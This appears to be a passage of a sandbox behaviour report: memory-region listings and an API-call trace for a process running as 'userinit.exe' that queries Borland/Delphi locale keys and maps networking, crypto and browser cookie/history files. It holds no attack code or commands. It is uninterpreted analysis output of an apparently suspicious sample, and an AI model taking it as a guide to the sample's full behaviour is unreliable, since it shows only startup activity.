end_va = 0xdd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000009e0000"
filename = ""
Region:
id = 6796
start_va = 0x360000
end_va = 0x3dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000360000"
filename = ""
Region:
id = 6797
start_va = 0x890000
end_va = 0x99cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000890000"
filename = ""
Region:
id = 6798
start_va = 0x9a0000
end_va = 0x9dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000009a0000"
filename = ""
Region:
id = 6799
start_va = 0x2400000
end_va = 0x24fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002400000"
filename = ""
Region:
id = 6800
start_va = 0x2500000
end_va = 0x26fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002500000"
filename = ""
Region:
id = 6801
start_va = 0xde0000
end_va = 0xe60fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6802
start_va = 0x2700000
end_va = 0x2782fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6803
start_va = 0xde0000
end_va = 0xe64fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6804
start_va = 0x2700000
end_va = 0x2786fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6805
start_va = 0xde0000
end_va = 0xe68fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6806
start_va = 0x2700000
end_va = 0x278afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6807
start_va = 0xde0000
end_va = 0xe6cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6808
start_va = 0x2700000
end_va = 0x278efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6809
start_va = 0xde0000
end_va = 0xe70fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6810
start_va = 0x2700000
end_va = 0x2792fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6811
start_va = 0xde0000
end_va = 0xe74fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6812
start_va = 0x2700000
end_va = 0x2796fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6813
start_va = 0xde0000
end_va = 0xe78fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6814
start_va = 0x2700000
end_va = 0x279afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6815
start_va = 0xde0000
end_va = 0xe7cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6816
start_va = 0x2700000
end_va = 0x279efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6817
start_va = 0xde0000
end_va = 0xe80fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6818
start_va = 0x2700000
end_va = 0x27a2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6819
start_va = 0xde0000
end_va = 0xe84fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6820
start_va = 0x2700000
end_va = 0x27a6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6821
start_va = 0xde0000
end_va = 0xe88fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6822
start_va = 0x2700000
end_va = 0x27aafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6823
start_va = 0xde0000
end_va = 0xe8cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6824
start_va = 0x2700000
end_va = 0x27aefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6825
start_va = 0xde0000
end_va = 0xe90fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6826
start_va = 0x2700000
end_va = 0x27b2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6827
start_va = 0xde0000
end_va = 0xe94fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6828
start_va = 0x2700000
end_va = 0x27b6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6829
start_va = 0xde0000
end_va = 0xe98fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6830
start_va = 0x2700000
end_va = 0x27bafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6831
start_va = 0xde0000
end_va = 0xe9cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6832
start_va = 0x2700000
end_va = 0x27befff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6833
start_va = 0xde0000
end_va = 0xea0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6834
start_va = 0x2700000
end_va = 0x27c2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6835
start_va = 0xde0000
end_va = 0xea4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6836
start_va = 0x2700000
end_va = 0x27c6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6837
start_va = 0xde0000
end_va = 0xea8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6838
start_va = 0x2700000
end_va = 0x27cafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6839
start_va = 0xde0000
end_va = 0xeacfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6840
start_va = 0x2700000
end_va = 0x27cefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6842
start_va = 0xde0000
end_va = 0xeb0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6843
start_va = 0x2700000
end_va = 0x27d2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6877
start_va = 0xde0000
end_va = 0xeb4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6878
start_va = 0x2700000
end_va = 0x27d6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6879
start_va = 0xde0000
end_va = 0xeb8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6880
start_va = 0x2700000
end_va = 0x27dafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6881
start_va = 0xde0000
end_va = 0xebcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 6882
start_va = 0x2700000
end_va = 0x27defff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6883
start_va = 0x27e0000
end_va = 0x28c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027e0000"
filename = ""
Region:
id = 6892
start_va = 0x28d0000
end_va = 0x29b2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028d0000"
filename = ""
Region:
id = 6893
start_va = 0x2700000
end_va = 0x27e4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6905
start_va = 0x27f0000
end_va = 0x28d6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 6906
start_va = 0x2700000
end_va = 0x27e8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6907
start_va = 0x27f0000
end_va = 0x28dafff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 6908
start_va = 0x2700000
end_va = 0x27ecfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6909
start_va = 0x27f0000
end_va = 0x28defff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 6911
start_va = 0x28e0000
end_va = 0x29d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028e0000"
filename = ""
Region:
id = 6912
start_va = 0x2700000
end_va = 0x27f2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6915
start_va = 0x2800000
end_va = 0x28f4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 6916
start_va = 0x2700000
end_va = 0x27f6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6922
start_va = 0x2800000
end_va = 0x28f8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 6923
start_va = 0x2700000
end_va = 0x27fafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6924
start_va = 0x2800000
end_va = 0x28fcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 6930
start_va = 0x2700000
end_va = 0x27fefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6931
start_va = 0x2800000
end_va = 0x2900fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 6936
start_va = 0x2910000
end_va = 0x2a12fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002910000"
filename = ""
Region:
id = 6937
start_va = 0x2700000
end_va = 0x2804fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6938
start_va = 0x2810000
end_va = 0x2916fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 6943
start_va = 0x2700000
end_va = 0x2808fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6944
start_va = 0x2810000
end_va = 0x291afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 6948
start_va = 0x2700000
end_va = 0x280cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6949
start_va = 0x2810000
end_va = 0x291ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 6954
start_va = 0x2920000
end_va = 0x2a32fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002920000"
filename = ""
Region:
id = 6955
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 6956
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 6957
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 6958
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 6959
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 6960
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 6961
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 6962
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x100000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 6963
start_va = 0x2a40000
end_va = 0x2b3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a40000"
filename = ""
Region:
id = 6964
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 6969
start_va = 0x6d820000
end_va = 0x6d838fff
entry_point = 0x6d820000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 6970
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 6971
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 6972
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 6973
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 6976
start_va = 0xe10000
end_va = 0xe4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e10000"
filename = ""
Region:
id = 6977
start_va = 0x2c40000
end_va = 0x2d3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c40000"
filename = ""
Region:
id = 6978
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 6979
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 6980
start_va = 0x2d40000
end_va = 0x300efff
entry_point = 0x2d40000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 6984
start_va = 0x120000
end_va = 0x121fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000120000"
filename = ""
Region:
id = 6985
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 6986
start_va = 0x130000
end_va = 0x130fff
entry_point = 0x130000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 6987
start_va = 0x140000
end_va = 0x141fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 6988
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 6989
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 6990
start_va = 0x130000
end_va = 0x130fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 6991
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 6992
start_va = 0x1b0000
end_va = 0x1dbfff
entry_point = 0x1b0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 6993
start_va = 0x220000
end_va = 0x25ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000220000"
filename = ""
Region:
id = 6994
start_va = 0x150000
end_va = 0x157fff
entry_point = 0x150000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 6995
start_va = 0x1e0000
end_va = 0x1effff
entry_point = 0x1e0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 6996
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 6997
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 6998
start_va = 0x2b40000
end_va = 0x2bcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b40000"
filename = ""
Region:
id = 6999
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 7000
start_va = 0x3010000
end_va = 0x309ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003010000"
filename = ""
Region:
id = 7001
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 7002
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 7006
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 7007
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 7008
start_va = 0x30a0000
end_va = 0x315ffff
entry_point = 0x30a0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Thread:
id = 346
os_tid = 0x994
[0209.317] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0209.317] GetKeyboardType (nTypeFlag=0) returned 4
[0209.317] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0209.317] GetStartupInfoA (in: lpStartupInfo=0x1afb3c | out: lpStartupInfo=0x1afb3c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0209.317] GetVersion () returned 0x1db10106
[0209.317] GetVersion () returned 0x1db10106
[0209.317] GetCurrentThreadId () returned 0x994
[0209.318] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x1af638, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0209.318] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1af513, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0209.318] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af628 | out: phkResult=0x1af628*=0x0) returned 0x2
[0209.318] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af628 | out: phkResult=0x1af628*=0x0) returned 0x2
[0209.318] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af628 | out: phkResult=0x1af628*=0x0) returned 0x2
[0209.318] lstrcpynA (in: lpString1=0x1af513, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0209.318] GetThreadLocale () returned 0x409
[0209.318] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x1af623, cchData=5 | out: lpLCData="ENU") returned 4
[0209.319] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0209.319] lstrcpynA (in: lpString1=0x1af530, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0209.319] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0209.319] lstrcpynA (in: lpString1=0x1af530, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0209.319] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0209.319] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0209.320] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x273640
[0209.320] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x650000
[0209.320] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x274640
[0209.320] VirtualAlloc (lpAddress=0x650000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x650000
[0209.320] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0209.320] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0209.320] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0209.320] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0209.320] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x1af75c, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x1af748, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0209.321] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x1af748, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0209.321] GetVersionExA (in: lpVersionInformation=0x1afae0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1afae0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0209.321] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
